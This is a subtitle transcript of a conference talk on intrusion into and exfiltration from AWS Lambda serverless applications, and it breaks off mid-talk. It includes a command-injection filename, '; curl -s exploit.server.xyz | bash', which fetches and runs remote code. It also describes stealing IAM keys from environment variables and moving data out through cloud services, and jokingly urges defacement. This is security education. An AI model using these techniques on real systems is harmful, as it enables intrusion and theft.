[Script Info]
Title:

[Events]
Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text
Dialogue: 0,0:00:00.00,0:00:13.28,Default,,0000,0000,0000,,{\i1}preroll music{\i0}
Dialogue: 0,0:00:13.28,0:00:18.95,Default,,0000,0000,0000,,Herald: Like in the following talk I'm\Nhappy to introduce Rich Jones. Rich is
Dialogue: 0,0:00:18.95,0:00:25.01,Default,,0000,0000,0000,,gonna talk about what he can do in 60\Nmilliseconds with server-less servers.
Dialogue: 0,0:00:25.01,0:00:28.66,Default,,0000,0000,0000,,And please give a warm\Nround of applause for Rich!
Dialogue: 0,0:00:28.66,0:00:36.35,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:00:36.35,0:00:44.01,Default,,0000,0000,0000,,Rich: Hi everybody! Thank you very much\Nfor having me, for CCC for hosting, for
Dialogue: 0,0:00:44.01,0:00:48.94,Default,,0000,0000,0000,,you guys for coming out! I appreciate it.\NMy name is Rich Jones. I'm the founder and
Dialogue: 0,0:00:48.94,0:00:55.60,Default,,0000,0000,0000,,CTO of gun.io. We find awesome freelance\Ngigs for free and open source hackers. I'm
Dialogue: 0,0:00:55.60,0:01:02.54,Default,,0000,0000,0000,,also the author of ZAPPA. Which is the best \Ndamn server-less framework in the world.
Dialogue: 0,0:01:02.54,0:01:08.38,Default,,0000,0000,0000,,It can run any python web application on \NAWS lambda. You can build event driven
Dialogue: 0,0:01:08.38,0:01:16.14,Default,,0000,0000,0000,,applications you can connect roughly \N500.000 connections per second globally.
Dialogue: 0,0:01:16.14,0:01:22.17,Default,,0000,0000,0000,,Without any operations support right \Nout of the box for your existing apps.
Dialogue: 0,0:01:22.17,0:01:29.32,Default,,0000,0000,0000,,I first announced it about 6 months\Nago actually at Hack & Tell event at
Dialogue: 0,0:01:29.32,0:01:34.63,Default,,0000,0000,0000,,C-Base and now it is like used in\Nproduction by all sorts of big companies
Dialogue: 0,0:01:34.63,0:01:41.02,Default,,0000,0000,0000,,which is pretty cool!
You should try it out.\NWelcome to my talk, it is called Gone in
Dialogue: 0,0:01:41.02,0:01:46.70,Default,,0000,0000,0000,,60 Milliseconds! aka having a sexy title\Ngets your talk accepted at conferences.
Dialogue: 0,0:01:46.70,0:01:53.31,Default,,0000,0000,0000,,aka Intrusion and Exfiltration in\NServer-less Architectures. Whoooh. What the
Dialogue: 0,0:01:53.31,0:02:01.94,Default,,0000,0000,0000,,hell does that mean? Quick poll. Who here\Nis familiar with AWS Lambda? Okay, so
Dialogue: 0,0:02:01.94,0:02:08.13,Default,,0000,0000,0000,,about half, that's pretty good. That's\Nwhat I was expecting. Okay, great. For the
Dialogue: 0,0:02:08.13,0:02:14.65,Default,,0000,0000,0000,,unfamiliar, the good old days of servers.\NYou would have the web server it would
Dialogue: 0,0:02:14.65,0:02:19.07,Default,,0000,0000,0000,,connect to the database and that was\Npretty much it it would – you'd have the
Dialogue: 0,0:02:19.07,0:02:23.91,Default,,0000,0000,0000,,server. You'd have one server, you'd\Nprobably run lots of services off that
Dialogue: 0,0:02:23.91,0:02:30.71,Default,,0000,0000,0000,,server so if you found a debug panel or\Nsomething like that, you could use one of
Dialogue: 0,0:02:30.71,0:02:35.53,Default,,0000,0000,0000,,your favorite tools, you could get a shell\Nand basically run amok I know is the
Dialogue: 0,0:02:35.53,0:02:44.14,Default,,0000,0000,0000,,best. With the server-less architecture\Nthis one example it uses instead of a
Dialogue: 0,0:02:44.14,0:02:49.72,Default,,0000,0000,0000,,permanent web-server it uses this service\Ncalled AWS Lambda which provides no
Dialogue: 0,0:02:49.72,0:02:55.89,Default,,0000,0000,0000,,permanent infrastructure Your entire\Napplication function is held in cache by
Dialogue: 0,0:02:55.89,0:03:02.57,Default,,0000,0000,0000,,Amazon AWS and it's spawned and destroyed\Non a per-request basis.
So in the space of
Dialogue: 0,0:03:02.57,0:03:07.78,Default,,0000,0000,0000,,a single web request or whatever function\Nrequest, it creates the container, returns
Dialogue: 0,0:03:07.78,0:03:13.11,Default,,0000,0000,0000,,and destroys the container. The code\Nexecution is triggered by a variety of
Dialogue: 0,0:03:13.11,0:03:19.44,Default,,0000,0000,0000,,cloud event sources every request is in an\Nisolated container. I'm gonna put an
Dialogue: 0,0:03:19.44,0:03:24.70,Default,,0000,0000,0000,,asterisk next to next to isolated as you\Nsee. The big advantage for the company is
Dialogue: 0,0:03:24.70,0:03:29.03,Default,,0000,0000,0000,,that it's super scalable. So, because one\Nrequest is one server it means that 10
Dialogue: 0,0:03:29.03,0:03:32.34,Default,,0000,0000,0000,,requests is 10 servers and so on and so on\Nand so on. So you can scale this all the
Dialogue: 0,0:03:32.34,0:03:37.37,Default,,0000,0000,0000,,way up to like trillions of events per\Nyear which is pretty cool. It's also much
Dialogue: 0,0:03:37.37,0:03:44.22,Default,,0000,0000,0000,,less expensive because you pay by the\Nmillisecond .000002 dollars per
Dialogue: 0,0:03:44.22,0:03:49.57,Default,,0000,0000,0000,,millisecond which interestingly is now the\Nsame in euros keep an eye on that,
Dialogue: 0,0:03:49.57,0:03:56.93,Default,,0000,0000,0000,,I was surprised by. Security patches to the\Noperating system are automatic because
Dialogue: 0,0:03:56.93,0:04:00.63,Default,,0000,0000,0000,,Amazon handles them so there is basically\Nyou don't worry about the operating system
Dialogue: 0,0:04:00.63,0:04:05.92,Default,,0000,0000,0000,,at all you only worry about your single\Nfunction which saves time, saves money,
Dialogue: 0,0:04:05.92,0:04:11.92,Default,,0000,0000,0000,,and lets you fire all people who work in\NOPS. Some common patterns that you see for
Dialogue: 0,0:04:11.92,0:04:16.80,Default,,0000,0000,0000,,companies and, you know, services are\Nusing lambda.
One is just the web server
Dialogue: 0,0:04:16.80,0:04:22.95,Default,,0000,0000,0000,,this is like if you already use zappa for\Na django CMS or something like this. It's
Dialogue: 0,0:04:22.95,0:04:29.46,Default,,0000,0000,0000,,just API gateway, another AWS service to\Nlambda, which is the one we saw before
Dialogue: 0,0:04:29.46,0:04:32.83,Default,,0000,0000,0000,,Another common way that people are using\Nthis for asynchronous data processing.
Dialogue: 0,0:04:32.83,0:04:37.33,Default,,0000,0000,0000,,So if you have a file upload, that will then\Nexecute the lambda function which will
Dialogue: 0,0:04:37.33,0:04:44.61,Default,,0000,0000,0000,,store the result in a DynamoDB store and\Nthen have that trigger the upload to the
Dialogue: 0,0:04:44.61,0:04:53.91,Default,,0000,0000,0000,,S3 return bucket. So this is kind of like\Na very simple microservice type framework
Dialogue: 0,0:04:53.91,0:05:00.32,Default,,0000,0000,0000,,that you can use lambda for. Chat bots is\Nanother common use case So if you having a
Dialogue: 0,0:05:00.32,0:05:05.00,Default,,0000,0000,0000,,SMS Message or an e-mail exchange with a\Nrobot, it could be through lambda or one
Dialogue: 0,0:05:05.00,0:05:10.76,Default,,0000,0000,0000,,of those cool new like echo things. Maybe\Nwe will be able to like actually hack
Dialogue: 0,0:05:10.76,0:05:15.77,Default,,0000,0000,0000,,through those in the future using some of\Nthese techniques. So you can kind of see
Dialogue: 0,0:05:15.77,0:05:21.78,Default,,0000,0000,0000,,that there.
And the big one that a lot of\Ncompanies are using like fintech and
Dialogue: 0,0:05:21.78,0:05:28.34,Default,,0000,0000,0000,,medical and science companies are using\Nfor is is kind of the driving engine for
Dialogue: 0,0:05:28.34,0:05:32.29,Default,,0000,0000,0000,,the state machine in big data processing.\NThis is kind of the interesting one that
Dialogue: 0,0:05:32.29,0:05:39.24,Default,,0000,0000,0000,,we get into a little bit more later in the\Ntalk So the lambda kind of drives the
Dialogue: 0,0:05:39.24,0:05:47.07,Default,,0000,0000,0000,,queue which is how the like big data\Nprocessing like compute cluster is knowing
Dialogue: 0,0:05:47.07,0:05:51.84,Default,,0000,0000,0000,,what to do. And there is loads more of\Nthese patterns but those are some of the
Dialogue: 0,0:05:51.84,0:05:57.06,Default,,0000,0000,0000,,ones that I've seen pretty commonly. So\Nwhen you try to attack these kind of
Dialogue: 0,0:05:57.06,0:06:01.65,Default,,0000,0000,0000,,applications it probably won't work. And\Neven if it does work, it will shut down
Dialogue: 0,0:06:01.65,0:06:07.63,Default,,0000,0000,0000,,immediately because they live in these\Nshort lived isolated container which is
Dialogue: 0,0:06:07.63,0:06:12.75,Default,,0000,0000,0000,,no fun. The container dies after the\Nfunction returns. Oh no! What does that
Dialogue: 0,0:06:12.75,0:06:16.62,Default,,0000,0000,0000,,mean for us? Us hackers. I mean it is\Nharder to infiltrate because there is less
Dialogue: 0,0:06:16.62,0:06:21.68,Default,,0000,0000,0000,,common code most of the stuff is custom so\Nfar. You can't use the same wordpress
Dialogue: 0,0:06:21.68,0:06:27.42,Default,,0000,0000,0000,,vulnerability over and over again. The\Nservices are isolated, the functions are
Dialogue: 0,0:06:27.42,0:06:33.68,Default,,0000,0000,0000,,isolated, there is no users to really\Nescalate on the system.
There's no
Dialogue: 0,0:06:33.68,0:06:37.87,Default,,0000,0000,0000,,sysadmins to, you know, do your cool cron\Ntricks or whatever, for gaining
Dialogue: 0,0:06:37.87,0:06:44.94,Default,,0000,0000,0000,,escalation. It's also harder to persist\Nour malware because it immediately dies as
Dialogue: 0,0:06:44.94,0:06:49.91,Default,,0000,0000,0000,,soon as the container closes. It is also a\Nread-only filesystem, so we can't hide our
Dialogue: 0,0:06:49.91,0:06:56.23,Default,,0000,0000,0000,,files deep in the operating system And\Nit's only a sub-second lifecycle for the
Dialogue: 0,0:06:56.23,0:07:01.44,Default,,0000,0000,0000,,entire container anyway. There is no\Ninitialization system to infect because
Dialogue: 0,0:07:01.44,0:07:08.17,Default,,0000,0000,0000,,that is all taken care of by amazon and we\Ncan't get at it. It is also harder to
Dialogue: 0,0:07:08.17,0:07:12.78,Default,,0000,0000,0000,,exfiltrate, because there is a thing\Ncalled the virtual private cloud AWS
Dialogue: 0,0:07:12.78,0:07:18.26,Default,,0000,0000,0000,,provides. There's also function specific\Nroles which means a very strict
Dialogue: 0,0:07:18.26,0:07:24.69,Default,,0000,0000,0000,,permissioning system. A lot of times we can't \Nget a reverse shell because there is no network
Dialogue: 0,0:07:24.69,0:07:30.40,Default,,0000,0000,0000,,access. So basically sad face. Oh no,\Nwe're totally boned!
Dialogue: 0,0:07:30.40,0:07:38.03,Default,,0000,0000,0000,,No we're not, hell not, dog. When Bezos \Ncloses a door, he opens a window.
Dialogue: 0,0:07:38.03,0:07:46.95,Default,,0000,0000,0000,,{\i1}laughter{\i0}\N{\i1}applause{\i0}
Dialogue: 0,0:07:46.95,0:07:53.26,Default,,0000,0000,0000,,So we gonna learn some recon, some\Ninfiltration, some exploitation, some
Dialogue: 0,0:07:53.26,0:08:01.09,Default,,0000,0000,0000,,exfiltration and a little bit of cleanup!\NPart 0: Recon aka How the hell do we know
Dialogue: 0,0:08:01.09,0:08:06.39,Default,,0000,0000,0000,,what we're attacking?
There's gonna be two\Nattack surfaces. An outer and inner attack
Dialogue: 0,0:08:06.39,0:08:14.43,Default,,0000,0000,0000,,surface for a lambda function. The outer\Nattack surfaces are the API Gateway so if
Dialogue: 0,0:08:14.43,0:08:20.57,Default,,0000,0000,0000,,you look at the headers and you see that\Nit's serving dynamic content from
Dialogue: 0,0:08:20.57,0:08:26.34,Default,,0000,0000,0000,,CloudFront, that might be an indication that\Nyou're dealing with API Gateway.
Dialogue: 0,0:08:26.34,0:08:30.43,Default,,0000,0000,0000,,File uploads is pretty easy if you look at\Nwhatever the upload endpoint is and you
Dialogue: 0,0:08:30.43,0:08:35.18,Default,,0000,0000,0000,,look at headers that says it is S3 that\Nprobably means that it's S3. If you look at
Dialogue: 0,0:08:35.18,0:08:38.62,Default,,0000,0000,0000,,the email headers that you're\Ncommunicating to the function with you can
Dialogue: 0,0:08:38.62,0:08:44.55,Default,,0000,0000,0000,,see that it is Amazon SES so that is\Npretty obvious. There is also the inner
Dialogue: 0,0:08:44.55,0:08:49.06,Default,,0000,0000,0000,,attack surface. So these are services that\Nwe can't access directly, but provide
Dialogue: 0,0:08:49.06,0:08:54.63,Default,,0000,0000,0000,,event sources for the function, so this\Ncan mean a whole bunch of stuff, so queues
Dialogue: 0,0:08:54.63,0:08:59.25,Default,,0000,0000,0000,,if there are a lot of long running tasks\Nand it's on AWS, it is possible that they
Dialogue: 0,0:08:59.25,0:09:05.48,Default,,0000,0000,0000,,are using the SQS queuing system. But it\Ncan also mean database events, streams of
Dialogue: 0,0:09:05.48,0:09:10.48,Default,,0000,0000,0000,,information, user events, so logins and\Nuser creations and stuff like that can
Dialogue: 0,0:09:10.48,0:09:17.71,Default,,0000,0000,0000,,also be an event source. And the log\Nsystem itself can provide an event source.
Dialogue: 0,0:09:17.71,0:09:25.98,Default,,0000,0000,0000,,Part 1 infiltration aka how the hell are\Nwe gonna weaponize all that? So lambda
Dialogue: 0,0:09:25.98,0:09:30.99,Default,,0000,0000,0000,,functions essentially what the application\Nis, is kind of like a blue ball machine here.
Dialogue: 0,0:09:30.99,0:09:37.77,Default,,0000,0000,0000,,What we call Rube Goldberg machines.\NI just learned, for the translators, that
Dialogue: 0,0:09:37.77,0:09:43.20,Default,,0000,0000,0000,,you guys call these nonsense machines.\NEssentially lots of little functions and a
Dialogue: 0,0:09:43.20,0:09:48.08,Default,,0000,0000,0000,,lot of passing information between them.\NSo to figure out what's going on, we're
Dialogue: 0,0:09:48.08,0:09:54.56,Default,,0000,0000,0000,,going to use a process of destructive\Nmechanics aka dropping a bolt into the
Dialogue: 0,0:09:54.56,0:09:58.33,Default,,0000,0000,0000,,engine and then listening to the sound\Nthat it makes to try to figure out what is
Dialogue: 0,0:09:58.33,0:10:06.13,Default,,0000,0000,0000,,going on inside. The TL;DR of that is we\Ngonna attack the event sources themselves,
Dialogue: 0,0:10:06.13,0:10:10.85,Default,,0000,0000,0000,,we're going to fire off every type of\Ncloud event service that we can and
Dialogue: 0,0:10:10.85,0:10:18.01,Default,,0000,0000,0000,,basically see what shakes out. The usual\Nsuspects for infection, unsanitized input,
Dialogue: 0,0:10:18.01,0:10:25.09,Default,,0000,0000,0000,,deserialization bugs of all, you know all\Nvarieties, server side script injection,
Dialogue: 0,0:10:25.09,0:10:30.28,Default,,0000,0000,0000,,malicious binary files, and if it is a web\Nserver, most of your favorite web
Dialogue: 0,0:10:30.28,0:10:35.66,Default,,0000,0000,0000,,application type exploits.
So just as a\Nvery trivial example of the kind of things
Dialogue: 0,0:10:35.66,0:10:43.63,Default,,0000,0000,0000,,that you might see here, So here is some\Ntrivially vulnerable code it's connecting
Dialogue: 0,0:10:43.63,0:10:51.60,Default,,0000,0000,0000,,to an S3 bucket, it's going over the items\Nand it's calling some process on the keys
Dialogue: 0,0:10:51.60,0:10:59.31,Default,,0000,0000,0000,,that are in the bucket. But what happens\Nif we create an object called: "; curl -s
Dialogue: 0,0:10:59.31,0:11:04.94,Default,,0000,0000,0000,,exploit.server.xyz | bash" well then\Nthat's gonna expand because it is just
Dialogue: 0,0:11:04.94,0:11:13.20,Default,,0000,0000,0000,,using the key name to call, you know, our\Nexploit code on the lambda function.
Dialogue: 0,0:11:13.20,0:11:22.16,Default,,0000,0000,0000,,Hurray! we did it! Part 2 exploitation aka\Nhow can we escalate our infection? aka
Dialogue: 0,0:11:22.16,0:11:28.81,Default,,0000,0000,0000,,what the hell is a lambda? aka what's\Nworth stealing? So if we actually find,
Dialogue: 0,0:11:28.81,0:11:31.97,Default,,0000,0000,0000,,you know, if we just look at the operating\Nsystem of a lambda, now that we're able to
Dialogue: 0,0:11:31.97,0:11:36.73,Default,,0000,0000,0000,,execute commands on it. Well that won't\Nwork as we don't have a shell, everything
Dialogue: 0,0:11:36.73,0:11:46.15,Default,,0000,0000,0000,,on lambda had this event context pattern\Nin it, whatever but if we do the find and
Dialogue: 0,0:11:46.15,0:11:52.68,Default,,0000,0000,0000,,we look at it, it pretty much looks like\Nstandard redhat 6 installation it's got
Dialogue: 0,0:11:52.68,0:11:57.76,Default,,0000,0000,0000,,python 2.7, interestingly it has python\N3.4 on it, it's got node, it's got perl,
Dialogue: 0,0:11:57.76,0:12:04.14,Default,,0000,0000,0000,,it's got gcc, it's got all you know, stuff\Nthat we like. Which is pretty good.
If we
Dialogue: 0,0:12:04.14,0:12:08.39,Default,,0000,0000,0000,,look at the system even further, we'll see\Nthat it's running an operating system
Dialogue: 0,0:12:08.39,0:12:14.89,Default,,0000,0000,0000,,called Amazon Linux, which is the default\Nfor EC2, so maybe it's an EC2 server.
Dialogue: 0,0:12:14.89,0:12:20.87,Default,,0000,0000,0000,,If it's an EC2 server, can we access the\Nmetainfo server? That's a good idea!
Dialogue: 0,0:12:20.87,0:12:25.52,Default,,0000,0000,0000,,For those who don't know about the meta-\Ndata server, from Amazon docs: Instance
Dialogue: 0,0:12:25.52,0:12:29.33,Default,,0000,0000,0000,,metadata is data about your instance that\Nyou can use to configure or manage the
Dialogue: 0,0:12:29.33,0:12:33.45,Default,,0000,0000,0000,,running instance, anyone who can access\Nthe instance can view its metadata.
Dialogue: 0,0:12:33.45,0:12:38.22,Default,,0000,0000,0000,,Therefore, you should take suitable\Nprecautions to protect sensitive data aka
Dialogue: 0,0:12:38.22,0:12:41.62,Default,,0000,0000,0000,,don't get hacked, because people can look\Nat this stuff. We can figure out all this
Dialogue: 0,0:12:41.62,0:12:46.33,Default,,0000,0000,0000,,information including keys and users and\Nsecurity groups so, you know, really good,
Dialogue: 0,0:12:46.33,0:12:53.28,Default,,0000,0000,0000,,good intel. What happens if we try to\Naccess the server? It doesn't work, so,
Dialogue: 0,0:12:53.28,0:12:57.17,Default,,0000,0000,0000,,sorry. But that's a good trick to remember\Nif you are attacking EC2, that you can get
Dialogue: 0,0:12:57.17,0:13:01.90,Default,,0000,0000,0000,,a lot of information out of the metainfo\Nserver. Now you're thinking, well let's take a
Dialogue: 0,0:13:01.90,0:13:06.04,Default,,0000,0000,0000,,look at the environment, let's look around\Nwhat's in the environment variables.
Dialogue: 0,0:13:06.04,0:13:10.36,Default,,0000,0000,0000,,Quite a lot actually including some inter-\Nesting stuff like session tokens, security
Dialogue: 0,0:13:10.36,0:13:17.08,Default,,0000,0000,0000,,tokens, access key IDs and secret access \Nkeys. So that's pretty cool. What are
Dialogue: 0,0:13:17.08,0:13:25.26,Default,,0000,0000,0000,,those? Enter IAM, so this is Amazon's\Nidentity and access management system
Dialogue: 0,0:13:25.26,0:13:32.67,Default,,0000,0000,0000,,which provides per resource authentication\Nand authorisation definition. So basically
Dialogue: 0,0:13:32.67,0:13:39.37,Default,,0000,0000,0000,,1 task is gonna have 1, you know, set of\Nauthorisation to perform its functions.
Dialogue: 0,0:13:39.37,0:13:46.47,Default,,0000,0000,0000,,It sounds bad, it is. Like it makes our \Njob a lot harder. The good news is that
Dialogue: 0,0:13:46.47,0:13:51.26,Default,,0000,0000,0000,,it's super easy to fuck up! Pretty much\Neverybody who's using IAM has probably
Dialogue: 0,0:13:51.26,0:13:56.29,Default,,0000,0000,0000,,fucked up. Especially if you read the\Ndocumentations which Amazon provides which
Dialogue: 0,0:13:56.29,0:14:02.93,Default,,0000,0000,0000,,is terrible, or even badder if they got\Ntheir information from the AWS forum where
Dialogue: 0,0:14:02.93,0:14:09.17,Default,,0000,0000,0000,,you can find like real gems of wisdom\Nabout give everybody access to everything,
Dialogue: 0,0:14:09.17,0:14:13.64,Default,,0000,0000,0000,,which is nice. So full disclosure,\Neverything all the fun stuff that we're
Dialogue: 0,0:14:13.64,0:14:20.00,Default,,0000,0000,0000,,gonna do, does depend on them having\Nsome misconfigured IAM even subtly
Dialogue: 0,0:14:20.00,0:14:26.78,Default,,0000,0000,0000,,misconfigured IAM which isn't as cool, I\Nhave to admit but it's pretty common, so I
Dialogue: 0,0:14:26.78,0:14:32.61,Default,,0000,0000,0000,,don't think it's unreasonable to have\Nthat, be part of our attack criteria.
Dialogue: 0,0:14:32.61,0:14:38.60,Default,,0000,0000,0000,,So what the keys that we saw, were part of\Nthe lambda execution policy which uses
Dialogue: 0,0:14:38.60,0:14:43.67,Default,,0000,0000,0000,,this permission called iam:PassRole\Nbasically you take a predefined policy for
Dialogue: 0,0:14:43.67,0:14:48.12,Default,,0000,0000,0000,,what a function is allowed to do. It\Ncreates a temporary user with those
Dialogue: 0,0:14:48.12,0:14:52.93,Default,,0000,0000,0000,,permissions and gives the credentials for\Nthat user into the userspace in those
Dialogue: 0,0:14:52.93,0:14:59.82,Default,,0000,0000,0000,,environment variables that we saw. So this\Nis one of the ones that Amazon recommends,
Dialogue: 0,0:14:59.82,0:15:07.59,Default,,0000,0000,0000,,this is the AWS VPCAccessExecutionRole\Nthis is from Amazon's documentation and
Dialogue: 0,0:15:07.59,0:15:13.88,Default,,0000,0000,0000,,this actually provides some interesting\Nthings that we're gonna be able to use.
Dialogue: 0,0:15:13.88,0:15:19.20,Default,,0000,0000,0000,,Resource:* is a great one because that\Nmeans we have access to everything
Dialogue: 0,0:15:19.20,0:15:23.36,Default,,0000,0000,0000,,available to the account We will need to\Ncreate log groups and streams, which is
Dialogue: 0,0:15:23.36,0:15:27.32,Default,,0000,0000,0000,,kind of interesting. Describing the\Nnetwork interface is also super
Dialogue: 0,0:15:27.32,0:15:31.67,Default,,0000,0000,0000,,interesting for us. And this will come in\Nhandy later. Okay, so we can describe the
Dialogue: 0,0:15:31.67,0:15:37.00,Default,,0000,0000,0000,,network What about actually like infecting\Nthe application source? Like we wanna add
Dialogue: 0,0:15:37.00,0:15:40.30,Default,,0000,0000,0000,,a backdoor. But first, where does the code\Nlive?
So we check the environment
Dialogue: 0,0:15:40.30,0:15:48.91,Default,,0000,0000,0000,,variables again we see this key value for\NLAMBDA_TASK_ROOT which is good so we will
Dialogue: 0,0:15:48.91,0:15:54.45,Default,,0000,0000,0000,,just cat our backdoor into the application\NNo that is not gonna work. Sad face,
Dialogue: 0,0:15:54.45,0:15:59.60,Default,,0000,0000,0000,,because it's a read-only filesystem. \NAnd even if you could, write to that, you
Dialogue: 0,0:15:59.60,0:16:05.36,Default,,0000,0000,0000,,know, write to the filesystem, it's not\Ngonna persist for other users who, to call
Dialogue: 0,0:16:05.36,0:16:09.37,Default,,0000,0000,0000,,the function because it's not cached in\Nmemory so it would only live for the span
Dialogue: 0,0:16:09.37,0:16:14.62,Default,,0000,0000,0000,,of a single HTTP request which we don't\Ncare about. But, I got all of these cool,
Dialogue: 0,0:16:14.62,0:16:20.81,Default,,0000,0000,0000,,like hacker tools I wanna install on the\Nsystem how do I do that? Fortunately there
Dialogue: 0,0:16:20.81,0:16:25.25,Default,,0000,0000,0000,,is /tmp space on the disk because some,\Nyou know, normal applications are gonna
Dialogue: 0,0:16:25.25,0:16:31.65,Default,,0000,0000,0000,,need to read and write files and stuff so\N/tmp is totally readable and it works as
Dialogue: 0,0:16:31.65,0:16:39.99,Default,,0000,0000,0000,,we'd expected to. Amazon describes this as\Nephemeral disk capacity. But ephemeral
Dialogue: 0,0:16:39.99,0:16:46.56,Default,,0000,0000,0000,,isn't quite true actually, because this is\Nhow lambda executions are not completely
Dialogue: 0,0:16:46.56,0:16:54.07,Default,,0000,0000,0000,,isolated. For performance reasons they're\Nactually cached in Amazon's memory across
Dialogue: 0,0:16:54.07,0:17:00.92,Default,,0000,0000,0000,,different executions.
So because /tmp is a\Nram disk, and because ram is cached that
Dialogue: 0,0:17:00.92,0:17:07.73,Default,,0000,0000,0000,,means that /tmp is cached as well, so if\Nwe can store our tools across multiple
Dialogue: 0,0:17:07.73,0:17:14.30,Default,,0000,0000,0000,,executions. Yay! But the caveat for that is\Nthat we have to keep the function warm in
Dialogue: 0,0:17:14.30,0:17:20.78,Default,,0000,0000,0000,,memory by calling it every so often That\Nlength of time is 4 minutes, 30 seconds
Dialogue: 0,0:17:20.78,0:17:25.33,Default,,0000,0000,0000,,Somebody violated an NDA to tell you that,\Ndon't ask me
Dialogue: 0,0:17:25.33,0:17:28.01,Default,,0000,0000,0000,,{\i1}laughing{\i0}
Dialogue: 0,0:17:28.01,0:17:33.06,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:17:33.06,0:17:36.63,Default,,0000,0000,0000,,What's cool is this actually can also\Napply to long running processes as well.
Dialogue: 0,0:17:36.63,0:17:43.13,Default,,0000,0000,0000,,It won't keep the function open, but it\Nwill, kind of, pause the process and then
Dialogue: 0,0:17:43.13,0:17:51.55,Default,,0000,0000,0000,,reopen it on the next execution. So now we\Ncan install, if we have linux x86_64
Dialogue: 0,0:17:51.55,0:17:56.98,Default,,0000,0000,0000,,compiled versions of all our favorite\Ntools we could put them on to the lambda
Dialogue: 0,0:17:56.98,0:18:02.32,Default,,0000,0000,0000,,function and start calling it. Okay, so\Nnow we got some keys, we got some tools,
Dialogue: 0,0:18:02.32,0:18:07.55,Default,,0000,0000,0000,,what can we do? So the first thing that we\Nprobably wanna do, is just see what we're
Dialogue: 0,0:18:07.55,0:18:14.94,Default,,0000,0000,0000,,allowed to do. Using the AWS CLI tool we\Ncan call this code and we will get back a
Dialogue: 0,0:18:14.94,0:18:21.82,Default,,0000,0000,0000,,policy, and if we're lucky, it'll be {\b1}\N{\b0}** and then we can do whatever we want.
Dialogue: 0,0:18:21.82,0:18:28.89,Default,,0000,0000,0000,,Jackpot!
We can create a new admin user\Nand pillage all the databases basically,
Dialogue: 0,0:18:28.89,0:18:36.76,Default,,0000,0000,0000,,it's game over! Yeah right! Maybe it'll\Nhappen probably yeah right. A very brief
Dialogue: 0,0:18:36.76,0:18:42.66,Default,,0000,0000,0000,,interlude. If you do get the jackpot, if\Nyou are looking at Facebook's AWS usage and
Dialogue: 0,0:18:42.66,0:18:49.38,Default,,0000,0000,0000,,you get *****. Don't sell the user info to\Nspammers. Don't claim a bug bounty. Don't
Dialogue: 0,0:18:49.38,0:18:55.79,Default,,0000,0000,0000,,just like use their credit card to mine\Nbitcoin. Don't tell, you know, your
Dialogue: 0,0:18:55.79,0:19:02.37,Default,,0000,0000,0000,,favorite TLA. Don't even send all the\Ninformation to Julian, he's busy. Bug
Dialogue: 0,0:19:02.37,0:19:07.26,Default,,0000,0000,0000,,bounties are boring. Espionage is boring.\NI'm tired of all this like spy vs spy stuff.
Dialogue: 0,0:19:07.26,0:19:12.69,Default,,0000,0000,0000,,Use your skills of infection for awesome.\NPut up a bad-ass hacking crew name, you know.
Dialogue: 0,0:19:12.69,0:19:15.55,Default,,0000,0000,0000,,{\i1}laughing{\i0}
Dialogue: 0,0:19:15.55,0:19:19.57,Default,,0000,0000,0000,,Put spooky skulls, put a bunch of\Nspooky skulls on facebook.
Dialogue: 0,0:19:19.57,0:19:25.37,Default,,0000,0000,0000,,Put your IRC homies, know what's up\N{\i1}applause{\i0}
Dialogue: 0,0:19:25.37,0:19:32.22,Default,,0000,0000,0000,,I'm pretty serious about this, actually.\NLike I think the word losing some like
Dialogue: 0,0:19:32.22,0:19:37.07,Default,,0000,0000,0000,,aesthetic quality to our culture in\Npursuit of like money and like you know,
Dialogue: 0,0:19:37.07,0:19:43.95,Default,,0000,0000,0000,,careers and stuff like that.
But I think\Nthe aesthetic value actually has like more
Dialogue: 0,0:19:43.95,0:19:49.31,Default,,0000,0000,0000,,worth and that over time is like, the\Nbroader community begins to respect like
Dialogue: 0,0:19:49.31,0:19:54.76,Default,,0000,0000,0000,,our aesthetic contributions, like the\Nthose hacks will actually be worth more in
Dialogue: 0,0:19:54.76,0:20:02.51,Default,,0000,0000,0000,,the long run than any bug bounty that you'll\Nget now. So like keep it real, anyway,
Dialogue: 0,0:20:02.51,0:20:03.62,Default,,0000,0000,0000,,that was my side.
Dialogue: 0,0:20:03.62,0:20:09.01,Default,,0000,0000,0000,,{\i1}applause{\i0}
Dialogue: 0,0:20:09.01,0:20:17.08,Default,,0000,0000,0000,,So far more likely than {\i1}.{\i0}, you gonna get\Nsome kind of like strict permission, like
Dialogue: 0,0:20:17.08,0:20:23.18,Default,,0000,0000,0000,,the ability to access S3 objects, or the\Nability to access the database, or
Dialogue: 0,0:20:23.18,0:20:29.88,Default,,0000,0000,0000,,some combination thereof using various,\Ndifferent cloud services available. How
Dialogue: 0,0:20:29.88,0:20:34.15,Default,,0000,0000,0000,,can we use that for nefarious purposes you\Nwondering. That's a great question. Part 3:
Dialogue: 0,0:20:34.15,0:20:41.81,Default,,0000,0000,0000,,Exfiltration aka take the money and run\Naka the fun part. TL;DR when you don't have
Dialogue: 0,0:20:41.81,0:20:46.61,Default,,0000,0000,0000,,a direct network connection, to the things\Nthat you wanna access, because you using a
Dialogue: 0,0:20:46.61,0:20:52.11,Default,,0000,0000,0000,,cloud provider, you can use tags, meta\Ninformation, and the cloud services
Dialogue: 0,0:20:52.11,0:20:58.58,Default,,0000,0000,0000,,themselves to shuttle information out of\Nthe cloud.
So easy mode for instance, if we
Dialogue: 0,0:20:58.58,0:21:04.68,Default,,0000,0000,0000,,see that we have SES permissions, send,\Nuse the email, send, you know, we have a
Dialogue: 0,0:21:04.68,0:21:08.03,Default,,0000,0000,0000,,single function that will let us send an\Nemail out because it's a cloud provider
Dialogue: 0,0:21:08.03,0:21:14.08,Default,,0000,0000,0000,,that has an e-mail service. Or send a SMS,\Nyou know, you could actually, you can hack
Dialogue: 0,0:21:14.08,0:21:21.08,Default,,0000,0000,0000,,something and get the results back to your\Nvirtual cellphone. Slightly harder, if you
Dialogue: 0,0:21:21.08,0:21:27.63,Default,,0000,0000,0000,,just have S3 objects, you could, you know,\Nzip up the source of the application, put
Dialogue: 0,0:21:27.63,0:21:37.47,Default,,0000,0000,0000,,it on S3 and get it out that way. The fun\Nthing is VPC exfiltration. So this is the
Dialogue: 0,0:21:37.47,0:21:40.32,Default,,0000,0000,0000,,architecture that we were talking about\Nbefore It's a simple vibration but this is
